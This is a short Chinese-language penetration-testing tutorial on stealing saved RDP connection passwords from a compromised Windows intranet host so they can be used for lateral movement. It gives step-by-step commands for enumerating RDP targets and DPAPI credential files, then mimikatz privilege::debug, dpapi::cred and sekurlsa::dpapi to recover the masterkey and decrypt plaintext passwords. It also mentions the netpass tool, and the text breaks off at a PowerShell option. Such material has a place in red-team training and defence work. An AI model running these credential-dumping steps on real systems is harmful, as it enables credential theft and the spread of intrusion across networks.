0x01 简介

在获取内网机器管理员权限后，查看是否有保存到本地的RDP连接密码，对保存到本地的RDP连接密码进行解密，解密成功后可使用此凭据继续横向移动。

0x02 获取已控机器本地保存的RDP密码

一、mimikatz

1、查看本地机器本地连接过的目标机器。

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

2、查看本地用户此目录下是否存有RDP密码文件

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

查看保存在本地的远程主机信息

cmdkey /list

3、选择一个密码文件对其进行解密。此处需要记录下guidMasterKey的值，待会要通过guidMasterKey找对应的Masterkey。

mimikatz # privilege::debug

mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\8781378F7D47006A4FC98D2F8A266F58

4、根据guidMasterKey找到对应的Masterkey。

mimikatz # sekurlsa::dpapi

5、通过Masterkey解密出明文RDP连接密码。

mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d

二、netpass

下载：
netpass

使用：
双击netpass.exe
：

三、其他

powershell脚本自动化解密…